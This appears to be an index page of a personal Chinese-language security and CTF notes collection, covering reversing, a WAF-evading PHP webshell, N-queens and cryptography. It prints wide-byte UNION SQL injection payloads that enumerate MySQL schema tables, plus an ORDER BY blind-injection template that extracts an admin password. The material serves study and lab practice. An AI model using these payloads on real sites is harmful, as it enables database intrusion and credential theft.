classical reversing

逆向过程中的一点感悟

injection skills

网上收集的注入技巧。

图片链接的宽字节注入
hex(r0466cplushua)=0x723034363663706c7573687561
hex(pic)=0x706963
cat1.jpg%bf%27 union select 1,2,TABLE_NAME,4 from information_schema.TABLES where table_SCHEMA=0x723034363663706c7573687561 limit 1,1#
cat1.jpg%bf%27 union select 1,2,COLUMN_NAME,4 from information_schema.COLUMNS where table_NAME=0x706963 limit 1,1#
cat1.jpg%bf%27 union select 1,2,picname,4 from pic limit 2,1#

php webshell

研究了一下过狗原理,自己写了个一句话。

order by injection

本地搭建测试系统进行注入实践,包含php网页脚本、mysql数据库脚本、python爆破脚本。

order by 字段1,字段2 DESC  字段1是排序第一关键字,默认为升序;字段2是排序第二关键字,这里指定为降序
字段2处替换为: IF(1,bananas,cherries) 或 (case when 1 then bananas else cherries end)
ASCII(SUBSTRING((SELECT password FROM fruits WHERE username = 0x41646d696e),1,1))=0x30

N queens

回溯算法的核心思想:当进行到某一步时,发现先前的选择并不好或达不到目标,就退回一步重新选择。

算法、正则表达式知识

将pythonds-master.zip解压后放到安装目录中的lib目录下 C:\Python27\Lib\pythonds 就可以在脚本中直接使用了。

经典密码学

频率分析方法

Some python codes

一些有用的python代码片段

apk game

一道有意思的apk题目。

lilly

非常不错的爆破脚本

mis_lead

详见原文链接

flagen

调试过程中发现的问题1: